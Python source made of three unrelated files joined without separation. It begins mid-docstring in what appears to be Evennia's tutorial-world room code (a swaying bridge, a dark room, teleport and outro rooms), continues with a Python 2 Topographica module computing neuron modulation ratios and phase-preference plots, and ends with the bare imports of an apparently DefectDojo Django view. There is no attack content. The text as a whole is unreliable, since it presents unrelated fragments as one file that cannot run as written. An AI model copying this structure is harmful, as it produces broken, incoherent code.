              when exiting west.
       The room must also have the following Attributes
           - tutorial_bridge_position: the current position on
             on the bridge, 0 - 4.

    """
    key = "east"
    aliases = ["e"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """Advance one step east; leave the bridge past the last step."""
        caller = self.caller
        next_step = min(5, caller.db.tutorial_bridge_position + 1)

        if next_step > 4:
            # we have reached the far east end of the bridge -
            # move into the east room
            east_room = search_object(self.obj.db.east_exit)
            if east_room:
                caller.move_to(east_room[0])
            else:
                caller.msg("No east exit was found for this room. Contact an admin.")
            return

        caller.db.tutorial_bridge_position = next_step
        # all bridge steps share one actual room, so notify the others
        # in it that we moved
        caller.location.msg_contents("%s steps eastwards across the bridge." % caller.name, exclude=caller)
        caller.execute_cmd("look")


# go back across the bridge
class CmdWest(Command):
    """
    Go westwards across the bridge.

    Tutorial info:
       This command relies on the caller having two Attributes
       (assigned by the room when entering):
           - east_exit: a unique name or dbref to the room to go to
             when exiting east.
           - west_exit: a unique name or dbref to the room to go to
             when exiting west.
       The room must also have the following property:
           - tutorial_bridge_position: the current position on
             on the bridge, 0 - 4.

    """
    key = "west"
    aliases = ["w"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """Take one step west; leave the bridge before the first step."""
        caller = self.caller
        next_step = max(-1, caller.db.tutorial_bridge_position - 1)

        if next_step < 0:
            # we have reached the far west end of the bridge -
            # move into the west room
            west_room = search_object(self.obj.db.west_exit)
            if west_room:
                caller.move_to(west_room[0])
            else:
                caller.msg("No west exit was found for this room. Contact an admin.")
            return

        caller.db.tutorial_bridge_position = next_step
        # all bridge steps share one actual room, so notify the others
        # in it that we moved
        caller.location.msg_contents("%s steps westwards across the bridge." % caller.name, exclude=caller)
        caller.execute_cmd("look")


# Descriptions for each of the five bridge steps (index 0 = western end).
# Fixed user-facing typos from the original: duplicated "the the" and
# "planks does not" -> "planks do not".
BRIDGE_POS_MESSAGES = ("You are standing |wvery close to the bridge's western foundation|n."
                       " If you go west you will be back on solid ground ...",
                       "The bridge slopes precariously where it extends eastwards"
                       " towards the lowest point - the center point of the hang bridge.",
                       "You are |whalfways|n out on the unstable bridge.",
                       "The bridge slopes precariously where it extends westwards"
                       " towards the lowest point - the center point of the hang bridge.",
                       "You are standing |wvery close to the bridge's eastern foundation|n."
                       " If you go east you will be back on solid ground ...")
# Random atmosphere messages appended to every look on the bridge.
BRIDGE_MOODS = ("The bridge sways in the wind.", "The hanging bridge creaks dangerously.",
                "You clasp the ropes firmly as the bridge sways and creaks under you.",
                "From the castle you hear a distant howling sound, like that of a large dog or other beast.",
                "The bridge creaks under your feet. Those planks do not seem very sturdy.",
                "Far below you the ocean roars and throws its waves against the cliff,"
                " as if trying its best to reach you.",
                "Parts of the bridge come loose behind you, falling into the chasm far below!",
                "A gust of wind causes the bridge to sway precariously.",
                "Under your feet a plank comes loose, tumbling down. For a moment you dangle over the abyss ...",
                "The section of rope you hold onto crumble in your hands,"
                " parts of it breaking apart. You sway trying to regain balance.")

# Shown when the fall check in CmdLookBridge triggers.
FALL_MESSAGE = "Suddenly the plank you stand on gives way under your feet! You fall!" \
               "\nYou try to grab hold of an adjoining plank, but all you manage to do is to " \
               "divert your fall westwards, towards the cliff face. This is going to hurt ... " \
               "\n ... The world goes dark ...\n\n"


class CmdLookBridge(Command):
    """
    Look around at the bridge.

    Tutorial info:
        This command assumes that the room has an Attribute
        "fall_exit", a unique name or dbref of the place characters end up
        if they fall off the bridge.
    """
    key = 'look'
    aliases = ["l"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """Looking around, including a chance to fall."""
        caller = self.caller
        # position 0-4 along the bridge, set by BridgeRoom.at_object_receive
        bridge_position = self.caller.db.tutorial_bridge_position
        # this command is defined on the room, so we get it through self.obj
        location = self.obj
        # randomize the look-echo
        message = "|c%s|n\n%s\n%s" % (location.key,
                                      BRIDGE_POS_MESSAGES[bridge_position],
                                      random.choice(BRIDGE_MOODS))

        # list other player characters present (non-puppeted objects skipped)
        chars = [obj for obj in self.obj.contents_get(exclude=caller) if obj.has_account]
        if chars:
            # we create the You see: message manually here
            message += "\n You see: %s" % ", ".join("|c%s|n" % char.key for char in chars)
        self.caller.msg(message)

        # there is a chance that we fall if we are on the western or central
        # part of the bridge. Superusers never fall.
        if bridge_position < 3 and random.random() < 0.05 and not self.caller.is_superuser:
            # we fall 5% of time.
            fall_exit = search_object(self.obj.db.fall_exit)
            if fall_exit:
                self.caller.msg("|r%s|n" % FALL_MESSAGE)
                # quiet move: we send our own custom messages instead
                self.caller.move_to(fall_exit[0], quiet=True)
                # inform others on the bridge
                self.obj.msg_contents("A plank gives way under %s's feet and "
                                      "they fall from the bridge!" % self.caller.key)


# custom help command
class CmdBridgeHelp(Command):
    """
    Overwritten help command while on the bridge.

    Replaces the normal help command with a short reminder of the
    only two actions available while out on the bridge.
    """
    key = "help"
    aliases = ["h", "?"]
    locks = "cmd:all()"
    help_category = "Tutorial world"

    def func(self):
        """Implements the command."""
        # fix: the original text had an unmatched ")" after |wwest|n;
        # add the opening parenthesis to balance it.
        string = "You are trying hard not to fall off the bridge ..." \
                 "\n\nWhat you can do is trying to cross the bridge |weast|n" \
                 " or try to get back to the mainland (|wwest|n)."
        self.caller.msg(string)


class BridgeCmdSet(CmdSet):
    """Groups all commands usable while out on the bridge; stored on the room."""
    key = "Bridge commands"
    priority = 1  # higher than the default cmdset, so our look/help take precedence

    def at_cmdset_creation(self):
        """Populate the cmdset when it is first created."""
        for command_class in (CmdTutorial, CmdEast, CmdWest,
                              CmdLookBridge, CmdBridgeHelp):
            self.add(command_class())


# Random weather/ambience messages echoed to everyone in the BridgeRoom
# by update_weather().
BRIDGE_WEATHER = (
    "The rain intensifies, making the planks of the bridge even more slippery.",
    "A gust of wind throws the rain right in your face.",
    "The rainfall eases a bit and the sky momentarily brightens.",
    "The bridge shakes under the thunder of a closeby thunder strike.",
    "The rain pummels you with large, heavy drops. You hear the distinct howl of a large hound in the distance.",
    "The wind is picking up, howling around you and causing the bridge to sway from side to side.",
    "Some sort of large bird sweeps by overhead, giving off an eery screech. Soon it has disappeared in the gloom.",
    "The bridge sways from side to side in the wind.",
    "Below you a particularly large wave crashes into the rocks.",
    "From the ruin you hear a distant, otherwordly howl. Or maybe it was just the wind.")


class BridgeRoom(WeatherRoom):
    """
    The bridge room implements an unsafe bridge. It also enters the player into
    a state where they get new commands so as to try to cross the bridge.

     We want this to result in the account getting a special set of
     commands related to crossing the bridge. The result is that it
     will take several steps to cross it, despite it being represented
     by only a single room.

     We divide the bridge into steps:

        self.db.west_exit     -   -  |  -   -     self.db.east_exit
                              0   1  2  3   4

     The position is handled by a variable stored on the character
     when entering and giving special move commands will
     increase/decrease the counter until the bridge is crossed.

     We also have self.db.fall_exit, which points to a gathering
     location to end up if we happen to fall off the bridge (used by
     the CmdLookBridge command).

    """

    def at_object_creation(self):
        """Setups the room"""
        # this will start the weather room's ticker and tell
        # it to call update_weather regularly.
        super(BridgeRoom, self).at_object_creation()
        # this identifies the exits from the room (should be the command
        # needed to leave through that exit). These are defaults, but you
        # could of course also change them after the room has been created.
        self.db.west_exit = "cliff"
        self.db.east_exit = "gate"
        self.db.fall_exit = "cliffledge"
        # add the cmdset on the room.
        self.cmdset.add_default(BridgeCmdSet)
        # since the default Character's at_look() will access the room's
        # return_description (this skips the cmdset) when
        # first entering it, we need to explicitly turn off the room
        # as a normal view target - once inside, our own look will
        # handle all return messages.
        self.locks.add("view:false()")

    def update_weather(self, *args, **kwargs):
        """
        This is called at irregular intervals and makes the passage
        over the bridge a little more interesting.
        """
        # fix: random.random() returns a float in [0, 1), so the
        # original test `< 80` was always true; 0.8 actually sends
        # a message "most of the time" as the comment below intends.
        if random.random() < 0.8:
            # send a message most of the time
            self.msg_contents("|w%s|n" % random.choice(BRIDGE_WEATHER))

    def at_object_receive(self, character, source_location):
        """
        This hook is called by the engine whenever the player is moved
        into this room.
        """
        if character.has_account:
            # we only run this if the entered object is indeed a player object.
            # check so our east/west exits are correctly defined.
            wexit = search_object(self.db.west_exit)
            eexit = search_object(self.db.east_exit)
            fexit = search_object(self.db.fall_exit)
            if not (wexit and eexit and fexit):
                character.msg("The bridge's exits are not properly configured. "
                              "Contact an admin. Forcing west-end placement.")
                character.db.tutorial_bridge_position = 0
                return
            if source_location == eexit[0]:
                # we assume we enter from the same room we will exit to
                character.db.tutorial_bridge_position = 4
            else:
                # if not from the east, then from the west!
                character.db.tutorial_bridge_position = 0
            character.execute_cmd("look")

    def at_object_leave(self, character, target_location):
        """
        This is triggered when the player leaves the bridge room.
        """
        if character.has_account:
            # clean up the position attribute
            del character.db.tutorial_bridge_position


# -------------------------------------------------------------------------------
#
# Dark Room - a room with states
#
# This room limits the movements of its denizens unless they carry an active
# LightSource object (LightSource is defined in
#                     tutorialworld.objects.LightSource)
#
# -------------------------------------------------------------------------------


# Random messages echoed when looking/searching in the dark and finding nothing.
DARK_MESSAGES = ("It is pitch black. You are likely to be eaten by a grue.",
                 "It's pitch black. You fumble around but cannot find anything.",
                 "You don't see a thing. You feel around, managing to bump your fingers hard against something. Ouch!",
                 "You don't see a thing! Blindly grasping the air around you, you find nothing.",
                 "It's totally dark here. You almost stumble over some un-evenness in the ground.",
                 "You are completely blind. For a moment you think you hear someone breathing nearby ... "
                 "\n ... surely you must be mistaken.",
                 "Blind, you think you find some sort of object on the ground, but it turns out to be just a stone.",
                 "Blind, you bump into a wall. The wall seems to be covered with some sort of vegetation,"
                 " but its too damp to burn.",
                 "You can't see anything, but the air is damp. It feels like you are far underground.")

# Echoed when searching while already carrying a LightSource object.
ALREADY_LIGHTSOURCE = "You don't want to stumble around in blindness anymore. You already " \
                      "found what you need. Let's get light already!"

# Echoed when the hidden splinter (a LightSource) is found.
FOUND_LIGHTSOURCE = "Your fingers bump against a splinter of wood in a corner." \
                    " It smells of resin and seems dry enough to burn! " \
                    "You pick it up, holding it firmly. Now you just need to" \
                    " |wlight|n it using the flint and steel you carry with you."


class CmdLookDark(Command):
    """
    Look around in darkness

    Usage:
      look

    Look around in the darkness, trying
    to find something.
    """
    key = "look"
    aliases = ["l", 'feel', 'search', 'feel around', 'fiddle']
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """
        Implement the command.

        Works as both a look and a search; each use has a small
        random chance of eventually turning up a light source.
        """
        caller = self.caller

        if random.random() >= 0.8:
            # the 20% case - we may have found something!
            carries_source = any(utils.inherits_from(obj, LightSource)
                                 for obj in caller.contents)
            if carries_source:
                # already carrying a LightSource - no need for another
                caller.msg(ALREADY_LIGHTSOURCE)
            else:
                # no light source yet - create one in our inventory
                create_object(LightSource, key="splinter", location=caller)
                caller.msg(FOUND_LIGHTSOURCE)
        else:
            # 80% of the time we fumble around and find nothing
            caller.msg(random.choice(DARK_MESSAGES))


class CmdDarkHelp(Command):
    """
    Help command for the dark state.
    """
    key = "help"
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """
        Replace the help command with a not-so-useful help
        """
        string = "Can't help you until you find some light! Try looking/feeling around for something to burn. " \
                 "You shouldn't give up even if you don't find anything right away."
        self.caller.msg(string)


class CmdDarkNoMatch(Command):
    """
    This is a system command. Commands with special keys are used to
    override special situations in the game. The CMD_NOMATCH is used
    when the given command is not found in the current command set (it
    replaces Evennia's default behavior of offering command
    suggestions)
    """
    key = syscmdkeys.CMD_NOMATCH
    locks = "cmd:all()"

    def func(self):
        """Implements the command."""
        self.caller.msg("Until you find some light, there's not much you can do. Try feeling around.")


class DarkCmdSet(CmdSet):
    """
    Command set for the unlit room.

    Merged with mergetype "Replace" so it completely overrides
    whatever command set it is merged onto (normally the default
    cmdset). The stock say command is included so players can
    still talk while in the dark.
    """
    key = "darkroom_cmdset"
    mergetype = "Replace"
    priority = 2

    def at_cmdset_creation(self):
        """Populate the cmdset."""
        for command in (CmdTutorial(), CmdLookDark(),
                        CmdDarkHelp(), CmdDarkNoMatch()):
            self.add(command)
        # the default say command is added as a class; Evennia
        # instantiates it itself
        self.add(default_cmds.CmdSay)


class DarkRoom(TutorialRoom):
    """
    A dark room. This tries to start the DarkState script on all
    objects entering. The script is responsible for making sure it is
    valid (that is, that there is no light source shining in the room).

    The is_lit Attribute is used to define if the room is currently lit
    or not, so as to properly echo state changes.

    Since this room (in the tutorial) is meant as a sort of catch-all,
    we also make sure to heal characters ending up here, since they
    may have been beaten up by the ghostly apparition at this point.

    """

    def at_object_creation(self):
        """
        Called when object is first created.
        """
        super(DarkRoom, self).at_object_creation()
        self.db.tutorial_info = "This is a room with custom command sets on itself."
        # the room starts dark.
        self.db.is_lit = False
        # permanent=True makes the cmdset survive server reloads
        self.cmdset.add(DarkCmdSet, permanent=True)

    def at_init(self):
        """
        Called when room is first recached (such as after a reload)
        """
        # re-evaluate lighting, since light sources may have changed
        # while the room was out of cache
        self.check_light_state()

    def _carries_light(self, obj):
        """
        Checks if the given object carries anything that gives light.

        Note that we do NOT look for a specific LightSource typeclass,
        but for the Attribute is_giving_light - this makes it easy to
        later add other types of light-giving items. We also accept
        if there is a light-giving object in the room overall (like if
        a splinter was dropped in the room)
        """
        # superusers are always treated as carrying light (unaffected by dark)
        return obj.is_superuser or obj.db.is_giving_light or any(o for o in obj.contents if o.db.is_giving_light)

    def _heal(self, character):
        """
        Heal a character.
        """
        # restore to max health; fall back to 20 if no max was ever set
        health = character.db.health_max or 20
        character.db.health = health

    def check_light_state(self, exclude=None):
        """
        This method checks if there are any light sources in the room.
        If there isn't it makes sure to add the dark cmdset to all
        characters in the room. It is called whenever characters enter
        the room and also by the Light sources when they turn on.

        Args:
            exclude (Object): An object to not include in the light check.
        """
        if any(self._carries_light(obj) for obj in self.contents if obj != exclude):
            # something in the room gives light - make the room viewable
            # and drop the dark commands
            self.locks.add("view:all()")
            self.cmdset.remove(DarkCmdSet)
            self.db.is_lit = True
            for char in (obj for obj in self.contents if obj.has_account):
                # this won't do anything if it is already removed
                char.msg("The room is lit up.")
        else:
            # noone is carrying light - darken the room
            self.db.is_lit = False
            self.locks.add("view:false()")
            self.cmdset.add(DarkCmdSet, permanent=True)
            for char in (obj for obj in self.contents if obj.has_account):
                if char.is_superuser:
                    char.msg("You are Superuser, so you are not affected by the dark state.")
                else:
                    # put players in darkness
                    char.msg("The room is completely dark.")

    def at_object_receive(self, obj, source_location):
        """
        Called when an object enters the room.
        """
        if obj.has_account:
            # a puppeted object, that is, a Character
            self._heal(obj)
            # in case the new guy carries light with them
            self.check_light_state()

    def at_object_leave(self, obj, target_location):
        """
        In case people leave with the light, we make sure to clear the
        DarkCmdSet if necessary.  This also works if they are
        teleported away.
        """
        # since this hook is called while the object is still in the room,
        # we exclude it from the light check, to ignore any light sources
        # it may be carrying.
        self.check_light_state(exclude=obj)


# -------------------------------------------------------------
#
# Teleport room - puzzles solution
#
# This is a sort of puzzle room that requires a certain
# attribute on the entering character to be the same as
# an attribute of the room. If not, the character will
# be teleported away to a target location. This is used
# by the Obelisk - grave chamber puzzle, where one must
# have looked at the obelisk to get an attribute set on
# oneself, and then pick the grave chamber with the
# matching imagery for this attribute.
#
# -------------------------------------------------------------


class TeleportRoom(TutorialRoom):
    """
    Teleporter - puzzle room.

    Important attributes (set at creation):
      puzzle_key    - which attr to look for on character
      puzzle_value  - what char.db.puzzle_key must be set to
      success_teleport_to -  where to teleport in case of success
      success_teleport_msg - message to echo while teleporting to success
      failure_teleport_to - where to teleport to in case of failure
      failure_teleport_msg - message to echo while teleporting to failure

    """

    def at_object_creation(self):
        """Called at first creation"""
        super(TeleportRoom, self).at_object_creation()
        # what character.db.puzzle_clue must be set to, to avoid teleportation.
        self.db.puzzle_value = 1
        # target of successful teleportation. Can be a dbref or a
        # unique room name.
        self.db.success_teleport_msg = "You are successful!"
        self.db.success_teleport_to = "treasure room"
        # the target of the failure teleportation.
        self.db.failure_teleport_msg = "You fail!"
        self.db.failure_teleport_to = "dark cell"

    def at_object_receive(self, character, source_location):
        """
        This hook is called by the engine whenever the player is moved into
        this room.
        """
        if not character.has_account:
            # only act on player characters.
            return
        # determine if the puzzle is a success or not
        # (compare as strings so e.g. int 1 matches the stored value)
        is_success = str(character.db.puzzle_clue) == str(self.db.puzzle_value)
        teleport_to = self.db.success_teleport_to if is_success else self.db.failure_teleport_to
        # note that this returns a list
        results = search_object(teleport_to)
        if not results or len(results) > 1:
            # we cannot move anywhere since no valid target was found.
            character.msg("no valid teleport target for %s was found." % teleport_to)
            return
        if character.is_superuser:
            # superusers don't get teleported
            character.msg("Superuser block: You would have been teleported to %s." % results[0])
            return
        # perform the teleport
        if is_success:
            character.msg(self.db.success_teleport_msg)
        else:
            character.msg(self.db.failure_teleport_msg)
        # teleport quietly to the new place
        character.move_to(results[0], quiet=True, move_hooks=False)
        # we have to call this manually since we turn off move_hooks
        # - this is necessary to make the target dark room aware of an
        # already carried light.
        results[0].at_object_receive(character, self)


# -------------------------------------------------------------
#
# Outro room - unique exit room
#
# Cleans up the character from all tutorial-related properties.
#
# -------------------------------------------------------------

class OutroRoom(TutorialRoom):
    """
    Outro room.

    Called when exiting the tutorial, cleans the
    character of tutorial-related attributes.

    """

    def at_object_creation(self):
        """
        Called when the room is first created.
        """
        super(OutroRoom, self).at_object_creation()
        self.db.tutorial_info = "The last room of the tutorial. " \
                                "This cleans up all temporary Attributes " \
                                "the tutorial may have assigned to the "\
                                "character."

    def at_object_receive(self, character, source_location):
        """
        Do cleanup.
        """
        if character.has_account:
            # strip all temporary tutorial attributes off the character.
            # NOTE(review): this assumes Evennia's db handler deletes
            # silently when an attribute is missing - confirm, else a
            # character who skipped part of the tutorial could error here.
            del character.db.health_max
            del character.db.health
            del character.db.last_climbed
            del character.db.puzzle_clue
            del character.db.combat_parry_mode
            del character.db.tutorial_bridge_position
            # delete any tutorial-world objects still carried
            for obj in character.contents:
                if obj.typeclass_path.startswith("evennia.contrib.tutorial_world"):
                    obj.delete()
            # clear all tutorial-category tags
            character.tags.clear(category="tutorial_world")

"""
Vision-specific analysis functions.

$Id: featureresponses.py 7714 2008-01-24 16:42:21Z antolikjan $
"""
__version__='$Revision: 7714 $'

from math import fmod,floor,pi,sin,cos,sqrt

import numpy
from numpy.oldnumeric import Float
from numpy import zeros, array, size, empty, object_
#import scipy

try:
    import pylab
except ImportError:
    print "Warning: Could not import matplotlib; pylab plots will not work."

import param

import topo
from topo.base.cf import CFSheet
from topo.base.sheetview import SheetView
from topo.misc.filepath import normalize_path
from topo.misc.numbergenerator import UniformRandom
from topo.plotting.plotgroup import create_plotgroup, plotgroups
from topo.command.analysis import measure_sine_pref

# Module-level scratch state shared between complexity() and
# _complexity_rec(): the strongest response found so far and the
# feature-index tuple where it occurred.
max_value = 0
global_index = ()

def _complexity_rec(x,y,index,depth,fm):
        """
        Recurrent helper function for complexity().

        Recursively enumerates every combination of feature-value
        indices in fm (an object with .features and .full_matrix) and
        records, in the module globals max_value/global_index, the
        index tuple giving the largest response at unit (x,y).
        """
        global max_value
        global global_index
        if depth<size(fm.features):
            # more features left to expand: recurse over every value of
            # the feature at this depth
            for i in range(size(fm.features[depth].values)):
                _complexity_rec(x,y,index + (i,),depth+1,fm)
        else:
            # full index tuple assembled - keep it if it beats the best so far
            if max_value < fm.full_matrix[index][x][y]:
                global_index = index
                max_value = fm.full_matrix[index][x][y]
    


def complexity(full_matrix):
    global global_index
    global max_value
    # NOTE: this string sits after the global statements, so it is an
    # ordinary expression statement rather than the function's actual
    # docstring; kept in place to avoid reordering statements.
    """This function expects as an input a object of type FullMatrix which contains
    responses of all neurons in a sheet to stimuly with different varying parameter values.
    One of these parameters (features) has to be phase. In such case it computes the classic
    modulation ratio (see Hawken et al. for definition) for each neuron and returns them as a matrix.
    """
    rows,cols = full_matrix.matrix_shape
    # `complexity` (shadowing the function name) and the res/average sums
    # below are computed but unused for the return value; only fftmeasure
    # is returned.
    complexity = zeros(full_matrix.matrix_shape)
    complex_matrix = zeros(full_matrix.matrix_shape,object_)
    fftmeasure = zeros(full_matrix.matrix_shape,Float)
    # find the index of the "phase" feature.
    # NOTE(review): phase_index stays unbound if no feature is named
    # "phase" - callers must guarantee phase was varied.
    i = 0
    for f in full_matrix.features:
        if f.name == "phase":
            
            phase_index = i
            break
        i=i+1
    sum = 0.0   # NOTE: shadows the builtin sum() within this function
    res = 0.0
    average = 0.0
    for x in range(rows):
        for y in range(cols):
            complex_matrix[x,y] = []#
            # reset the global best-response trackers before recursing
            max_value=-0.01
            global_index = ()
            _complexity_rec(x,y,(),0,full_matrix)
            
            #compute the sum of the responses over phases given the found index of highest response 

            iindex = array(global_index)
            sum = 0.0
            for i in range(size(full_matrix.features[phase_index].values)):
                iindex[phase_index] = i
                sum = sum + full_matrix.full_matrix[tuple(iindex.tolist())][x][y]
                
            #average
            average = sum / float(size(full_matrix.features[phase_index].values))
            
            res = 0.0
            #compute the sum of absolute values of the responses minus average
            for i in range(size(full_matrix.features[phase_index].values)):
                iindex[phase_index] = i
                res = res + abs(full_matrix.full_matrix[tuple(iindex.tolist())][x][y] - average)
                complex_matrix[x,y] = complex_matrix[x,y] + [full_matrix.full_matrix[tuple(iindex.tolist())][x][y]]

            #this is taking away the DC component
            #complex_matrix[x,y] -= numpy.min(complex_matrix[x,y])
            # debug plots for two hard-coded units - presumably left in from
            # development; they pop up pylab figures as a side effect.
            if x==15 and y==15:
                pylab.figure()
                pylab.plot(complex_matrix[x,y])
            if x==26 and y==26:
                pylab.figure()
                pylab.plot(complex_matrix[x,y])

            #complexity[x,y] = res / (2*sum)
            # tile the phase response 4x, zero-pad to 2048 samples, then read
            # off the modulation ratio 2*|F1|/|F0| at the first harmonic bin.
            fft = numpy.fft.fft(complex_matrix[x,y]+complex_matrix[x,y]+complex_matrix[x,y]+complex_matrix[x,y],2048)
            first_har = 2048/len(complex_matrix[0,0])
            if abs(fft[0]) != 0:
                fftmeasure[x,y] = 2 *abs(fft[first_har]) /abs(fft[0])
            else:
                fftmeasure[x,y] = 0
    return fftmeasure


def compute_ACDC_orientation_tuning_curves(full_matrix,curve_label,sheet):
    
    """ This function allows an alternative computation of orientation tuning curve where
    for each given orientation the response is computed as a maximum of AC or DC component 
    across the phases instead of the maximum used as a standard in Topographica"""
    # this method assumes that only single frequency has been used
    # locate the indices of the phase/orientation/frequency features.
    # NOTE(review): these stay unbound if a feature is missing - the
    # measurement is assumed to have varied all three.
    i = 0
    for f in full_matrix.features:
        if f.name == "phase":
            phase_index = i
        if f.name == "orientation":
            orientation_index = i
        if f.name == "frequency":
            frequency_index = i
        i=i+1
    print sheet.curve_dict
    # make sure the nested result dict exists before filling it
    if not sheet.curve_dict.has_key("orientationACDC"):
        sheet.curve_dict["orientationACDC"]={}
    sheet.curve_dict["orientationACDC"][curve_label]={}
    
    rows,cols = full_matrix.matrix_shape
    for o in xrange(size(full_matrix.features[orientation_index].values)):
        s_w = zeros(full_matrix.matrix_shape)
        for x in range(rows):
            for y in range(cols):
                # collect this unit's response at every phase for the
                # current orientation (single frequency assumed: index 0)
                or_response=[]
                for p in xrange(size(full_matrix.features[phase_index].values)):
                    index = [0,0,0]
                    index[phase_index] = p
                    index[orientation_index] = o
                    index[frequency_index] = 0
                    or_response.append(full_matrix.full_matrix[tuple(index)][x][y])
                
                # tile the phase response 4x, zero-pad to 2048 samples,
                # and take max(AC, DC) = max(2*|F1|, |F0|)
                fft = numpy.fft.fft(or_response+or_response+or_response+or_response,2048)
                first_har = 2048/len(or_response)
                s_w[x][y] = numpy.maximum(2 *abs(fft[first_har]),abs(fft[0]))
        # store one SheetView per orientation value under the curve label
        s = SheetView((s_w,sheet.bounds), sheet.name , sheet.precedence, topo.sim.time(),sheet.row_precedence)
        sheet.curve_dict["orientationACDC"][curve_label].update({full_matrix.features[orientation_index].values[o]:s}) 
    


def phase_preference_scatter_plot(sheet_name,diameter=0.39):
    """
    Save a scatter plot comparing phase preferences of nearby unit pairs.

    For 66 random sheet coordinates within +/-diameter, a second point
    is chosen a small fixed distance (0.03) away; the 'PhasePreference'
    values of the two corresponding matrix cells are plotted against
    each other, converted to degrees and unwrapped so the cloud stays
    near the diagonal. The figure is written to
    <simtime><sheet_name>_scatter.png via normalize_path.
    """
    r = UniformRandom(seed=1023)
    preference_map = topo.sim[sheet_name].sheet_views['PhasePreference']
    offset_magnitude = 0.03
    datax = []
    datay = []
    (v,bb) = preference_map.view()
    for z in zeros(66):
        # pick a random point and an offset neighbor, both clamped to
        # the +/-diameter box
        x = (r() - 0.5)*2*diameter
        y = (r() - 0.5)*2*diameter
        rand = r()
        xoff = sin(rand*2*pi)*offset_magnitude
        yoff = cos(rand*2*pi)*offset_magnitude
        xx = max(min(x+xoff,diameter),-diameter)
        yy = max(min(y+yoff,diameter),-diameter)
        x = max(min(x,diameter),-diameter)
        y = max(min(y,diameter),-diameter)
        [xc1,yc1] = topo.sim[sheet_name].sheet2matrixidx(xx,yy)
        [xc2,yc2] = topo.sim[sheet_name].sheet2matrixidx(x,y)
        # skip pairs that fell into the same matrix cell
        if((xc1==xc2) &  (yc1==yc2)): continue
        datax = datax + [v[xc1,yc1]]
        datay = datay + [v[xc2,yc2]]
    
    for i in range(0,len(datax)):
        # convert phase from [0,1] units to degrees and unwrap so points
        # cluster around the diagonal
        datax[i] = datax[i] * 360
        datay[i] = datay[i] * 360
        if(datay[i] > datax[i] + 180): datay[i]=  datay[i]- 360
        if((datax[i] > 180) & (datay[i]> 180)): datax[i] = datax[i] - 360; datay[i] = datay[i] - 360
        if((datax[i] > 180) & (datay[i] < (datax[i]-180))): datax[i] = datax[i] - 360; #datay[i] = datay[i] - 360
        
    f = pylab.figure()
    ax = f.add_subplot(111, aspect='equal')
    pylab.plot(datax,datay,'ro')
    pylab.plot([0,360],[-180,180])
    pylab.plot([-180,180],[0,360])
    pylab.plot([-180,-180],[360,360])
    ax.axis([-180,360,-180,360])
    pylab.xticks([-180,0,180,360], [-180,0,180,360])
    pylab.yticks([-180,0,180,360], [-180,0,180,360])
    pylab.grid()
    pylab.savefig(normalize_path(str(topo.sim.timestr()) + sheet_name + "_scatter.png"))



###############################################################################
# JABALERT: Should we move this plot and command to analysis.py or
# pylabplots.py, where all the rest are?
#
# In any case, it requires generalization; it should not be hardcoded
# to any particular map name, and should just do the right thing for
# most networks for which it makes sense.  E.g. it already measures
# the ComplexSelectivity for all measured_sheets, but then
# plot_modulation_ratio only accepts two with specific names.
# plot_modulation_ratio should just plot whatever it is given, and
# then analyze_complexity can simply pass in whatever was measured,
# with the user controlling what is measured using the measure_map
# attribute of each Sheet.  That way the complexity of any sheet could
# be measured, which is what we want.
#
# Specific changes needed:
#   - Make plot_modulation_ratio accept a list of sheets and
#      plot their individual modulation ratios and combined ratio.
#   - Remove complex_sheet_name argument, which is no longer needed
#   - Make sure it still works fine even if V1Simple doesn't exist;
#     as this is just for an optional scatter plot, it's fine to skip
#     it.
#   - Preferably remove the filename argument by default, so that
#     plots will show up in the GUI


def analyze_complexity(full_matrix,simple_sheet_name,complex_sheet_name,filename=None):
    """
    Compute modulation ratio for each neuron, to distinguish complex from simple cells.

    Uses full_matrix data obtained from measure_or_pref().

    If there is a sheet named as specified in simple_sheet_name,
    also plots its phase preference as a scatter plot.
    """
    import topo
    # every CFSheet flagged for map measurement gets a ComplexSelectivity view
    measured_sheets = [s for s in topo.sim.objects(CFSheet).values()
                       if hasattr(s,'measure_maps') and s.measure_maps]

    for sheet in measured_sheets:
        # Divide by two to get into 0-1 scale - that means simple/complex boundry is now at 0.5
        complx = array(complexity(full_matrix[sheet]))/2.0
        # Should this be renamed to ModulationRatio?
        sheet.sheet_views['ComplexSelectivity']=SheetView((complx,sheet.bounds), sheet.name , sheet.precedence, topo.sim.time(),sheet.row_precedence)
    # imported here (not at module top) - presumably to avoid a circular
    # import between the command and plotting modules.
    import topo.command.pylabplots
    topo.command.pylabplots.plot_modulation_ratio(full_matrix,simple_sheet_name=simple_sheet_name,complex_sheet_name=complex_sheet_name,filename=filename)

    # Avoid error if no simple sheet exists
    try:
        phase_preference_scatter_plot(simple_sheet_name,diameter=0.24999)
    except AttributeError:
        print "Skipping phase preference scatter plot; could not analyze region %s." \
              % simple_sheet_name


class measure_and_analyze_complexity(measure_sine_pref):
    """Macro for measuring orientation preference and then analyzing its complexity."""
    def __call__(self,**params):
        """
        Run the sine-grating preference measurement, then compute and
        store modulation ratios for the measured sheets.

        Returns the measurement result from the superclass call (the
        original discarded it, making the macro's result inaccessible
        to callers; returning it is backward compatible).
        """
        fm = super(measure_and_analyze_complexity,self).__call__(**params)
        analyze_complexity(fm,simple_sheet_name="V1Simple",complex_sheet_name="V1Complex",filename="ModulationRatio")
        return fm
    

# Register a plotgroup that runs the measurement macro above as its
# pre-plot hook and then displays the standard orientation maps plus
# the derived modulation-ratio and phase-preference plots.
pg= create_plotgroup(name='Orientation Preference and Complexity',category="Preference Maps",
             doc='Measure preference for sine grating orientation.',
             pre_plot_hooks=[measure_and_analyze_complexity.instance()])
pg.add_plot('Orientation Preference',[('Hue','OrientationPreference')])
pg.add_plot('Orientation Preference&Selectivity',[('Hue','OrientationPreference'),
                                                   ('Confidence','OrientationSelectivity')])
pg.add_plot('Orientation Selectivity',[('Strength','OrientationSelectivity')])
pg.add_plot('Modulation Ratio',[('Strength','ComplexSelectivity')])
pg.add_plot('Phase Preference',[('Hue','PhasePreference')])
pg.add_static_image('Color Key','command/or_key_white_vert_small.png')



# #  product
import logging

from django.contrib import messages
from django.contrib.auth.decorators import user_passes_test
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import render
from dojo.utils import add_breadcrumb
from dojo.forms import ToolTypeForm
from dojo.models import Tool_Type

